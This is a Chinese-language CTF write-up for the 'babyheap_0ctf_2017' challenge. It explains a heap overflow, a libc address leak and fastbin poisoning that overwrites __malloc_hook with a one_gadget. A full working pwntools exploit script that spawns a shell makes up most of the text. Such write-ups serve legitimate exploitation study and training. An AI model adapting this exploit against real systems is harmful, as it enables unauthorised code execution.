babyheap_0ctf_2017

保护全开

malloc,add都整得挺抽象的，但都大同小异。这道题还是挺有难度的

有个填充的时候的size可以大于自己申请的，有个堆溢出漏洞。

尝试改下个堆的size，再释放，再malloc，会报错，这个方法不行。

改掉了bin指针

堆2是指向free_chunk的，填充堆2也就是在fast_bin的指针上写上malloc_hook上面的地址，溢出堆3也能改bin指针。这里的地址有一定的要求。

在malloc_hook-0x23的地址上，dword(malloc_hook-0x23+0x8)这个地址的值是0x7f,满足0x70大小的fastbin的大小，所以malloc_hook-0x23这个地址可以当作fake_addr,再填充0x13字节到malloc_hook,写上one_gadget.

exp

from pwn import*
from LibcSearcher import *
#p=remote("node5.buuoj.cn",26041)
p=process("./babyheap_0ctf_2017")
context.log_level="debug"
context(arch='amd64',os='linux')
libc=ELF('./libc-2.23.so')

def add(size):
	p.sendlineafter('Command: ','1')
	p.sendlineafter('Size: ',str(size))
	
def full(index,size,content):
	p.sendlineafter('Command: ','2')
	p.sendlineafter('Index: ',str(index))
	p.sendlineafter('Size: ',str(size))
	p.sendlineafter('Content: ',content)

def free(index):
	p.sendlineafter('Command: ','3')
	p.sendlineafter('Index: ',str(index))

def show(index):
	p.sendlineafter('Command: ','4')
	p.sendlineafter('Index:',str(index))
	
add(0x10) #0 
add(0x10) #1
add(0x10) #2
add(0x10) #3
add(0x80) #4

free(1)
free(2)

payload=p64(0)*3+p64(0x21)+p64(0)*3+p64(0x20)+p8(0x80)
full(0,0x41,payload)


payload=p64(0)*3+p64(0x21)
full(3,0x20,payload)

add(0x10) #1
add(0x10) #2-->4


payload=p64(0)*3+p64(0x91)
full(3,0x20,payload)

add(0x30) #防止合并
free(4)

show(2)
p.recvuntil("Content:")
main_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-88
print(hex(main_addr))
base=main_addr-0x10-libc.sym['__malloc_hook']
system=base+libc.sym['system']

add(0x60) #4
free(4)

fake_addr=main_addr-0x10-0x23
full(2,0x8,p64(fake_addr))
'''
or
payload=p64(0)*3+p64(0x71)+p64(fake_addr)
full(3,0x28,payload)
'''
gdb.attach(p)
sleep(1)

add(0x60) #5
add(0x60) #6
one=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=base+one[1]
payload=b'a'*0x13+p64(one_gadget)
full(6,0x1b,payload)
add(0x10)

p.interactive()